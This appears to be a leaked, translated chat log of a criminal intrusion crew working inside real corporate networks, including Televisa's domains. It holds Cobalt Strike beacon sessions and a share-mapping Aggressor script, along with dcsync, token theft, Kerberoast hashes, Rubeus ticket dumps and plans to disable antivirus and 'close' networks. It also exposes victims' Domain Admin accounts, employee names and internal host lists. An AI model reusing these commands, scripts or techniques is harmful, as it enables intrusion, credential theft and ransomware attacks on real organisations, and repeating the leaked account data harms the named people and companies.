Hyper-V Requirements:      Virtual machine monitoring mode extensions: Yes
                           Virtualization enabled in firmware: Yes
                           Layer 2 address conversion: No
                           Data execution prevention available: Yes
```
win10, version, os etc.
Where do you run it?
```
System error 1332.
Matching between user names and security identifiers has not been performed.
```
there - where?
without /grant full, it's just going the wrong way.
```
C:\Users\awilson\Desktop>1.bat

C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.

C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.

C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.

C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.

C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.
```
```
NET share A=A: / grant:everyone,full
```
you have a space there, so lol)
the same principle: it read a file that doesn't exist. so what do you want?
```
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full
Unknown parameter /.

Syntax for this command:

NET SHARE
shared_resource
shared_resource=disk:path
                [/GRANT:user,[READ | CHANGE | FULL]]
                [/USERS:number | /UNLIMITED]
                [/REMARK:"text"]
                [/CACHE:Manual | Documents| Programs | BranchCache | None]
shared_resource [/USERS:number | /UNLIMITED]
                [/REMARK:"text"]
                [/CACHE:Manual | Documents | Programs | BranchCache | None]
{shared_resource | device_name | drive:path} /DELETE
shared_resource \\computer_name /DELETE

For more help, type NET HELPMSG 3506.

C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full
System error 1332.

The mapping between user names and security identifiers has not been done.
```
I ran the lead on our office computer. win10
what was the environment?
So it was in the batch file and it was telling me "I can't match something to something". I don't know what it was telling me?
```
/grant:everyone,full
```
it's not working at all
```
/grant Everyone:F /T /C /Q
/grant:everyone,full
```
did you take this into account? didn't you make this one? not this one?
what was the batch file and the exe?
I won't answer, you'll get scolded. did you make the batch file and then the exe? by any chance, did you save it?
good question, I do not know which of the confs it was written in. guys who remember where @tl2 wrote about the drive shares, please copy them.
you're welcome) the host is specified in the second argument) maps only c$ shares
thank you)
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use * \\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.

The command completed successfully.

[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           Z:        \\KCNEWBACKUP2020\c$      Microsoft Windows Network
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           Z:        \\KCNEWBACKUP2020\c$      Microsoft Windows Network
The command completed successfully.
```
Check.
```
#ShareMapper.cna
#Author: @noname
#no desc
# Registers a beacon console command that maps the c$ share of each listed host
# to a free drive letter, then lists the current mappings.
beacon_command_register("share-mapper", "shares attacher", "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");

alias share-mapper {
    if ($2 is $null) {
        berror($1, "Need hosts!");
    } else {
        # second argument: comma-separated host list
        @hsts = split(",", ["$2" trim]);
        foreach $entry (@hsts) {
            blog2($1, "Attaching c\$ in $entry host");
            bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
        }
        bshell($1, "net use");
    }
}
```
For fuck's sake, already threw it here. not alive? if not - to reopen then, @tl1 ok?
```
$krb5tgs$23$*sqlman$epctech.com$MSSQLSvc/sqlsrv02.epctech.com ydkwicd
```
Truthfully not yet tested myself) looks interesting, but what is the "poc.exe", is it an exploit or just a tool so that the file will not be deleted? I don't really understand it
http://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/
but not in 2, we guessed)
no new sessions today)
mm-hmmm, then continue to work. @tl2? and where do we have @user1 and @user3?
it's ok)) and @tl2 just re-snap the accessible kerb) how to check it?
there are kerbs of disconnected accounts, yes. you get the idea: if the kerb is a LA on the server somewhere, there may well be an admin hash, and so you can try to kerb what will be unbroken. check on the machine from which it was kerbed
yes, the kerbs are just there?
so what's the difference between admin/non-admin in this case, I'll look at the tickets
They've deleted a lot of admins, and now the kerbs are only on the absent.
no kerbs (kerbs only faster
@tl2 now I'll change it so it will be better. you at least change your ava)
it's ok, keep quiet for a minute and he'll see for himself)
look who wrote it, never mind, the point is it does not matter. he read and did not understand it, and what? well, read it carefully. and what did you throw at me first?
Yeah
1. kerbs will be the same no matter what machine they were shot on?
Not me)
re-shoot and direct to @tl2
Need to re-shoot
Yes, the old ones went stale...
there is an alternative solution for snpartners, there are, yes - but the farm is not there yet (and we have no kerbs at all, so the farm will be in 2 weeks anyway
kerbs yes, no kerbs
are your kerbs filmed?
we're trying to get the DA creds
:dog:
? as it turns out, nothing) (also a joke, don't take it seriously)
you know? and today you said "by ten" and then "by two". you said "by ten", and? it's clear, you just said the same) I didn't understand what I wrote? by two? ?
I have deja vu
it's on the old, but there will be new ones closer to 10
That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now?
on #stanthonyskc-com too, on #snpartners-com nothing new
How are the tasks going? :space_invader:
hello
How is the progress on the others? the chinese are not back, no new ones...
What time do we wrap it up, at 6:00? What time tonight?
Sessions are stuck.
Thanks a lot and I've got it... if you use the parameter --public-only then it will show only those where the user is admin
by default 50, like the threads are turned up to max... but that's cool. why is it so monstrously fast?
no it's not, it'll show the shares and take the list from the AD too
just shares
I think ad is only used with ips?
```
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct?
ops)
```
execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt
```
ping the hostlist)
```
 * SharpSharesNG --max-threads 10 --output console|/path/to/file
 *
 * ips - equiv ips ad
 * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
 * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
 * ips HostName [--os-detect] [--alive] [--exec] script\path
 * ips [ad] [--os-detect] [--alive] [--exec] script\path
 * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
 *
 *
 * shares - equiv shares ad
 * shares 10.0.0.1 [--os-detect] [--public-only]
 * shares 10.0.0.1/24 [--os-detect] [--public-only]
 * shares HostName [--os-detect] [--public-only]
 * shares [ad] [--os-detect] [--public-only]
 * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
```
Is it secluded? or just start it and it spits somewhere? is there any argument?
@all share please ѕharshareset one and a half pk
@user8 with @user3 are preparing which of?
today we close one network. however not, there already all in water. how is it?
if not, collect a detailed report in the conf
collects nothing, tried three times - does not collect
the work tools panel what, not working?
hm, something all the same lost, trying
@tl1 reboot my dedik plz))))
ugh, all so we picked at it so a month in zohocorp
in ada workgroup? and vg is what?
meanwhile study the methods of work through vpn in vg
20 min, then recurse
you now without a task?
what did you read in the mail? was it my version offline backups? understand how you recovered and what you missed?
```
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
You threw the output with the fqdn, and that's what I threw the output from. try to get the DC list from the list /dclist:
shell nltets /dclist:
yeah, fuck it
```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
just went to check. is there domain authorization?
hello
2 sessions in the water left?
all bruhtoff zapato, the session did not come to life, bullet?
ok
zaytit went so, and what do you mean by "works"?
this works?
yeah i mean we're gonna close today for sure, no matter what we found, no we didn't find it, we're gonna bust it
so yeah, we tried it, if we don't find any nass codes, fuck it, so you're probably gonna bust it without me
3 kobos per lock
I'm going to throw the builds in there
coba blocked again...
in the main domain
```
shell dir \\10.7.6.127\C$
[*] Tasked beacon to run: dir \\10.7.6.127\C$
[+] host called home, sent: 50 bytes
[+] received output:
 Volume in drive \\10.7.6.127\C$ has no label.
 Volume Serial Number is D68F-16CB

 Directory of \\10.7.6.127\C$

05/09/2016  11:32 a. m.             1,024 .rnd
05/09/2016  11:57 a. m.                 0 2016-09-05_ImportTool.log
30/04/2015  10:27 a. m.    <DIR>          inetpub
22/08/2013  09:52 a. m.    <DIR>          PerfLogs
10/02/2021  12:57 p. m.    <DIR>          Program Files
23/11/2020  09:51 p. m.    <DIR>          Program Files (x86)
09/02/2021  10:31 a. m.    <DIR>          quarantine
16/10/2018  10:09 a. m.                17 SA.txt
29/04/2015  04:41 p. m.    <DIR>          sysprep
08/05/2018  11:46 a. m.    <DIR>          temp
10/02/2021  12:46 p. m.    <DIR>          Users
10/02/2021  01:01 p. m.    <DIR>          Windows
24/12/2020  04:35 a. m.                17 WINDOWS-OS-NoPetyaVac-Perfc.log
               4 File(s)          1,058 bytes
               9 Dir(s)  15,374,311,424 bytes free
```
CORPKIOBEY01.corp.televisa.com.mx
```
User name                    ES050616C
Full Name                    Servicio ES050616C
Comment                      CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code          (null)
Account active               Locked
Account expires              Never

Password last set            2/12/2021 1:08:33 AM
Password expires             6/12/2021 1:08:33 AM
Password changeable          2/13/2021 1:08:33 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/11/2021 2:05:13 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
The command completed successfully.
```
Well, then let's close today.
You've speeded up two more trusts?
```
Teemo[TVSAKIODC01]SYSTEM */14100|2021Feb12 22:01:17> dcsync televisa.com.mx
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:televisa.com.mx /all /csv command
[+] host called home, sent: 296050 bytes
[+] received output:
[DC] 'televisa.com.mx' will be the domain
[DC] 'TVSAKIODC01.televisa.com.mx' will be the DC server
[DC] Exporting domain 'televisa.com.mx'
```
on the timing for AV ?
according to software tests to @user3
there is a macaffi
it's not a fact that it's him, look for AV and drop vindef
toot another thing they have a lot of traffic as soon as, on some domain Traffic there is blocked, apparently some software
If we have an update on
the igekt - dll can be launched by hand
Maybe we should first launch the dll from one session on the servers, then the armas
Then through the shell dir\tasklist we will check if everything is ok
premium on the phno, he is in testing
+ like brought updated shellcode inge
you will get an account from that you have long asked
still update with you parsed algorithm
+ look admin nasa, backups and stuff
3 get into trusts
2 people re-serialize this domain
ponyatot
domain is a hashdump on dk
kredov imports from cobi in clearing
1 like a domain
looks like a localhost domain
CORPKIODC03
better to look at hypothetically adjacent servers
ha also think you understand that the triage can show tickets from adjacent domains
today think we'll close then work on the forum?
with rubeus
no you got us confused here
mimikom all right we did it
rubeus in general that crap you recorded on the tickets?
all under the record you at least record...
not with each other we fucked with each other what can you do and you fucked so much
another thing)))
https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a
```
[*] SamAccountName         : SCMusr
[*] DistinguishedName      : CN=Servicio SCM Users,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName   : MSSQLSvc/CORPSFEBDP115.corp.televisa.com.mx
[*] PwdLastSet             : 2/9/2021 12:12:24 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
```
```
[*] SamAccountName         : operaproy
[*] DistinguishedName      : CN=Operador Proyectos,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName   : http/corpkionscep01
[*] PwdLastSet             : 2/11/2021 5:25:45 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
```
https://prog.world/we-analyze-attacks-on-kerberos-using-rubeus-part-2/
LOL the site is in english and the screens are russian)))
https://habr.com/ru/company/tomhunter/blog/507140/
```
C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!
```
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
if for today you will close then change it)
that's how you can change their passwords
ho
```
UserName                 : iwam_gsccorp
Domain                   : CORP
LogonId                  : 0x5f97dbc1
UserSID                  : S-1-5-21-1935655697-1715567821-1801674531-500
AuthenticationPackage    : Negotiate
LogonType                : NewCredentials
LogonTime                : 2/11/2021 5:06:01 PM
LogonServer              :
LogonServerDNSDomain     : CORP.TELEVISA.COM.MX
UserPrincipalName        : IWAM_GSCCORP@televisa.com.mx

  ServiceName           :  krbtgt/CORP.TELEVISA.COM.MX
  ServiceRealm          :  CORP.TELEVISA.COM.MX
  UserName              :  scvmmadmin
  UserRealm             :  CORP.TELEVISA.COM.MX
  StartTime             :  2/12/2021 3:13:41 AM
  EndTime               :  2/12/2021 1:13:41 PM
  RenewTill             :  2/18/2021 5:28:41 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
```
or on third-party resources, see github
with this now
```
UserName                 : iwam_gsccorp
Domain                   : CORP
LogonId                  : 0xeccec
UserSID                  : S-1-5-21-1935655697-1715567821-1801674531-500
AuthenticationPackage    : Kerberos
LogonType                : RemoteInteractive
LogonTime                : 1/29/2021 7:45:21 PM
LogonServer              : CORPKIODC04
LogonServerDNSDomain     : CORP.TELEVISA.COM.MX
UserPrincipalName        : IWAM_GSCCORP@televisa.com.mx

  ServiceName           :  krbtgt/CORP.TELEVISA.COM.MX
  ServiceRealm          :  CORP.TELEVISA.COM.MX
  UserName              :  IWAM_GSCCORP
  UserRealm             :  CORP.TELEVISA.COM.MX
  StartTime             :  2/12/2021 6:50:28 AM
  EndTime               :  2/12/2021 4:50:28 PM
  RenewTill             :  2/12/2021 7:43:12 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  aes256_cts_hmac_sha1
```
Works
Check the koba again
after you click on endpoint nothing happens
what is the error?
so you used a token
```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:09> steal_token 4512
[*] Tasked beacon to steal the steal_token from PID 4512
[+] host called home, sent: 24 bytes
[+] Impersonated CORP\T1812

Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:48> shell dir \\10.7.0.55\C$
[*] Tasked beacon to run: dir \\10.7.0.55\C$
[+] host called home, sent: 61 bytes
[+] received output:
The user name or password is incorrect.
```
well I tried (
```
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    t1812
Full Name                    Servicio T1812
Comment                      Santa Fe Rep:4336636 Res1:JAVIER CRUZ BARRANCO Res2:ADRIAN RUIZ MONDRAGON (Alta) 08/01/2019 // Se agrego al grupo Domain Admins a peticion de Hugo Martinez Rocha por Correo electronico.
User's comment
Country/region code          (null)
Account active               Yes
Account expires              Never

Password last set            2/12/2021 1:18:50 AM
Password expires             6/12/2021 1:18:50 AM
Password changeable          2/13/2021 1:18:50 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/11/2021 9:31:41 AM

Logon hours allowed          All

Local Group Memberships      *Account Operators    *Server Operators
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
                             *Protected Users
```
```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 06:04:10> shell dir \\10.30.64.10\C$\Users
[*] Tasked beacon to run: dir \\10.30.64.10\C$\Users
[+] host called home, sent: 69 bytes
[+] received output:
 Volume in drive \\10.30.64.10\C$ is Windows
 Volume Serial Number is 56D1-9C35

 Directory of \\10.30.64.10\C$\Users

02/11/2021  03:46 PM    <DIR>          .
02/11/2021  03:46 PM    <DIR>          ..
11/21/2016  02:17 AM    <DIR>          public
05/22/2020  01:34 PM    <DIR>          SOPORTE-CITRIX
02/11/2021  03:46 PM    <DIR>          T1812
04/09/2020  09:36 PM    <DIR>          TVSADMIN
               0 File(s)              0 bytes
               6 Dir(s)  113,737,977,856 bytes free
```
this car should try to yank tickets tomorrow by 6
na today all and watch interesting tickets
check all servers
what are you rich?
```
  ServiceName           :  krbtgt/CORP.TELEVISA.COM.MX
  ServiceRealm          :  CORP.TELEVISA.COM.MX
  UserName              :  CORPKLHLQRD01$
  UserRealm             :  CORP.TELEVISA.COM.MX
  StartTime             :  2/11/2021 7:38:29 PM
  EndTime               :  2/12/2021 5:38:29 AM
  RenewTill             :  2/18/2021 7:38:29 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  aes256_cts_hmac_sha1
```
Wrong
UserName : CORPKLHLQRD01$
Yes, here's the b64 ticket
```
  ServiceName           :  krbtgt/CORP.TELEVISA.COM.MX
  ServiceRealm          :  CORP.TELEVISA.COM.MX
  UserName              :  CORPKLHLQRD01$
  UserRealm             :  CORP.TELEVISA.COM.MX
  StartTime             :  2/11/2021 7:38:28 PM
  EndTime               :  2/12/2021 5:38:28 PM
  RenewTill             :  2/18/2021 7:38:28 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  aes256_cts_hmac_sha1
```
I'm talking about this
```
Group 2 - Ticket Granting Ticket
 [00000000]
   Start/End/MaxRenew: 2/11/2021 7:38:47 PM ; 2/12/2021 5:38:28 AM ;
   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Target Name  (--) : @ CORP.TELEVISA.COM.MX
   Client Name  (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( $$Delegation Ticket$$ )
   Flags 60210000    : name_canonicalize ; pre_authenticated ; forwardable ;
   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 8        [...]
 [00000001]
   Start/End/MaxRenew: 2/11/2021 7:38:28 PM ; 2/12/2021 5:38:28 AM ; 2/18/2021 7:38:28 PM
   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Target Name  (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Client Name  (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( CORP.TELEVISA.COM.MX )
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 8        [...]
```
on the available server check the ticket during working hours
+ in corp? what domain are you in?
is there a ticket kerb?
```
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM |
```
```
-----------------------------------------------------------------------------------------------------------------------------------
| LUID  | UserName                              | Service                                                      | EndTime              |
-----------------------------------------------------------------------------------------------------------------------------------
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX                                  | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | DNS/corpklhlqdc01.corp.televisa.com.mx                       | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | GC/CORPKLHLQDC01.corp.televisa.com.mx/televisa.com.mx        | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx                      | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX                                  | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01                                           | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/corpsfedc02                                             | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPSFEVMMLIB                                           | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | host/CORPSFECRT03.corp.televisa.com.mx                       | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | RPCSS/CORPSFECRT03.corp.televisa.com.mx                      | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | CORPKLHLQRD01$                                               | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | LDAP/CORPKLHLQDC01.corp.televisa.com.mx                      | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
-----------------------------------------------------------------------------------------------------------------------------------
```
No, there is no check through the rubeus
dlya abuza gpo
ja about the triage ticket
mikaty same about pass ze ticket?
I looked at a couple of servers before yesterday, before they flew away, where were YES tickets, but they are not katiliv prochekali on the servers available ticketmiket?well, according to bludhound that they do not have rights there, except genericAll)))) the group admin winel no access to cars in the group admin winel) yes, there is no access to that, check?it means re-check on the cars where related groups through `execute-assembly SharpSharesNG.exe shares list corp_srv.txt --alive --public-only ` see what car has access to the car, let me send a list of cars on each of the polzakov (on the polzakovak we are interested) ` OU=Grupos Globales SNG15690.corp.televisa.com.mx SFE15693.corp.televisa.com.mx CHA15694.corp.televisa.com.mx SNG15689.corp.televisa.com.mx SNG15688.corp.televisa.com.mx CHA15695.corp.televisa.com.mx OU=SantaFe SFCITRIXAPLAN2.corp.televisa.com.mx SFCITRIXCLCONN2.corp.televisa.com.mx SFCITRIXAPUAT1.corp.televisa.com.mx QROCTXCLCONN1.corp.televisa.com.mx SFCITRIXAPLAN1.corp.televisa.com.mx CORPKIOBZT02_C1.corp.televisa.com.mx CORPSFEWEB07.corp.televisa.com.mx corpkiodb08.corp.televisa.com.mx corpkioapp05.corp.televisa.com.mx CORPSFEWEB09.corp.televisa.com.mx CHA19003.corp.televisa.com.mx SFE18620.corp.televisa.com.mx SFE18588.corp.televisa.com.mx SFE18590.corp.televisa.com.mx CHA18594.corp.televisa.com.mx cha19095.corp.televisa.com.mx SFE18617.corp.televisa.com.mx SNG18625.corp.televisa.com.mx SFE18595.corp.televisa.com.mx SNG15690.corp.televisa.com.mx SFE15693.corp.televisa.com.mx CHA15694.corp.televisa.com.mx SNG15689.corp.televisa.com.mx SNG15688.corp.televisa.com.mx CHA15695.corp.televisa.com.mx SFE18603.corp.televisa.com.mx SFE18582.corp.televisa.com.mx SFE19424.corp.televisa.com.mx SFE17146.corp.televisa.com.mx SFE20924.corp.televisa.com.mx SFE19785.corp.televisa.com.mx SFE20926.corp.televisa.com.mx SFE19784.corp.televisa.com.mx SFE18630.corp.televisa.com.mx SFE20231.corp.televisa.com.mx SFE12045.corp.televisa.com.mx 
SFE17310.corp.televisa.com.mx SFE20229.corp.televisa.com.mx SFE15467.corp.televisa.com.mx SFE16966.corp.televisa.com.mx SFE16221.corp.televisa.com.mx SFE18520.corp.televisa.com.mx SFE20228.corp.televisa.com.mx SFE20918.corp.televisa.com.mx SFE15474.corp.televisa.com.mx SFE20230.corp.televisa.com.mx SFE20227.corp.televisa.com.mx SFE18287.corp.televisa.com.mx SFE19786.corp.televisa.com.mx SFE21999.corp.televisa.com.mx SFE14238.corp.televisa.com.mx SFE21994.corp.televisa.com.mx SFE19195.corp.televisa.com.mx SFE14487.corp.televisa.com.mx SFE14491.corp.televisa.com.mx SFE14714.corp.televisa.com.mx SFE22582.corp.televisa.com.mx SFE22767.corp.televisa.com.mx SFE20792.corp.televisa.com.mx CORPKLHLMHAPT.corp.televisa.com.mx SFE22807.corp.televisa.com.mx Digital-09.corp.televisa.com.mx CORPKLHLRSAPT.corp.televisa.com.mx CORPKLHLATAP1T.corp.televisa.com.mx CORPKLHLATAP2T.corp.televisa.com.mx SFE17796.corp.televisa.com.mx SFCITRIXPROV1.corp.televisa.com.mx CORPKLHLRSAP2P.corp.televisa.com.mx CORPKLHLRSAPU.corp.televisa.com.mx CORPKLHLRSAP1P.corp.televisa.com.mx CORPKLHLATAP4P.corp.televisa.com.mx SFCITRIXAPUAT2.corp.televisa.com.mx CORPKLHLATAP2P.corp.televisa.com.mx SFCITRIXSFRONT1.corp.televisa.com.mx SFCITRIXSQLMR1.corp.televisa.com.mx SFCITRIXSQLMR2.corp.televisa.com.mx SFCITRIXPRDRS.corp.televisa.com.mx QROCITRIXSQLMR1.corp.televisa.com.mx SFCITRIXPRDATS.corp.televisa.com.mx QROCTIXAPLAN1.corp.televisa.com.mx CORPKLHLATAP1U.corp.televisa.com.mx SFCITRIXSQLMR3.corp.televisa.com.mx SFCTXPRFM1.corp.televisa.com.mx CORPKLHLATAP5P.corp.televisa.com.mx QROCTXPROV1.corp.televisa.com.mx CORPKLHLATAP2U.corp.televisa.com.mx QROCTXPRFM1.corp.televisa.com.mx QROCTXSTFRONT1.corp.televisa.com.mx CORPKLHLATAP1P.corp.televisa.com.mx SFCITRIXPROV2.corp.televisa.com.mx SFCITRIXSFRONT2.corp.televisa.com.mx SFCITRIXCLCONN1.corp.televisa.com.mx CORPKLHLATAP3P.corp.televisa.com.mx SFCTXPRFM2.corp.televisa.com.mx CORPSFECOD003.corp.televisa.com.mx CORPSFECOD002.corp.televisa.com.mx 
CORPSFECOD001.corp.televisa.com.mx TVSACHALTVC03.corp.televisa.com.mx CORPSFEBDP119.corp.televisa.com.mx xchange01.corp.televisa.com.mx CORPSFEBDQA02.corp.televisa.com.mx ORPRAP002.corp.televisa.com.mx ORPRAP008.corp.televisa.com.mx ORQASRV001.corp.televisa.com.mx ORDVAP005.corp.televisa.com.mx ORPRAP005.corp.televisa.com.mx ORDEVSRV001.corp.televisa.com.mx ORPRAP003.corp.televisa.com.mx ORPRWB002.corp.televisa.com.mx ORPRWB001.corp.televisa.com.mx ORDVAP004.corp.televisa.com.mx CORPSFEAPLP224.corp.televisa.com.mx instance-202001.corp.televisa.com.mx ORQAAP008.corp.televisa.com.mx ORQAAP007.corp.televisa.com.mx ORDVAP002.corp.televisa.com.mx ORPRAP004.corp.televisa.com.mx ORDVAP001.corp.televisa.com.mx CORPSFEBDP140.corp.televisa.com.mx CN=reto-admin SFE22614.corp.televisa.com.mx CN=Admin_Wintel CORPKIOBZT02_C1.corp.televisa.com.mx CORPSFEWEB07.corp.televisa.com.mx corpkiodb08.corp.televisa.com.mx corpkioapp05.corp.televisa.com.mx CORPSFEWEB09.corp.televisa.com.mx CORPSFECOD003.corp.televisa.com.mx CORPSFECOD002.corp.televisa.com.mx CORPSFECOD001.corp.televisa.com.mx TVSACHALTVC03.corp.televisa.com.mx CORPSFEBDP119.corp.televisa.com.mx xchange01.corp.televisa.com.mx CORPSFEBDQA02.corp.televisa.com.mx ORPRAP002.corp.televisa.com.mx ORPRAP008.corp.televisa.com.mx ORQASRV001.corp.televisa.com.mx ORDVAP005.corp.televisa.com.mx ORPRAP005.corp.televisa.com.mx ORDEVSRV001.corp.televisa.com.mx ORPRAP003.corp.televisa.com.mx ORPRWB002.corp.televisa.com.mx ORPRWB001.corp.televisa.com.mx ORDVAP004.corp.televisa.com.mx CORPSFEAPLP224.corp.televisa.com.mx instance-202001.corp.televisa.com.mx ORQAAP008.corp.televisa.com.mx ORQAAP007.corp.televisa.com.mx ORDVAP002.corp.televisa.com.mx ORPRAP004.corp.televisa.com.mx ORDVAP001.corp.televisa.com.mx CORPSFEBDP140.corp.televisa.com.mx CN=ISA Administracion Wintel aka CN=Admin_Wintel aka CN=Servidores Administrados Wintel Parametros PW CORP CORPKIOBZT02_C1.corp.televisa.com.mx CORPSFEWEB07.corp.televisa.com.mx 
memberOf: CN=ISA Full Access - users in the group have full access either to cyctrics or to vnp, look at adjacent groups in the found pksopopods and so ongety getovy not program code. all that showed from `reto-admin`. All PCs from these groups. These are the admins.
each user you have a password from each admin can? one message plus all the bundles are falling off each userf me so all deaf in general have moved a little further into the trasttoche all the cars where they can go check the cars 4 admins what do you have? but in the near future waiting for the farm for kerbs) not yet information or under php on the wind) anyone searched for oracle? I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe and can look for modules so if we do not have time for weekdays we will have busy weekends we need for a week at least 3 networks to close completely in the Mon will come new sessions sleep and rest next week will be difficult, right? i hope it's Saturday-Saturday = weekend :thumbsup: let's go home Da @tl1 supported rubbit really fall asleep at the keyboard go home already? for domain accounts can not be so passes may be different (i think so) he is listed as yes but he and LAa is not he so? Result: Not Found, it is being cracked by our background system. Please wait up to 5 days. A notification email will be sent to you when it is cracked successful, otherwise it is cracked failure. Checked 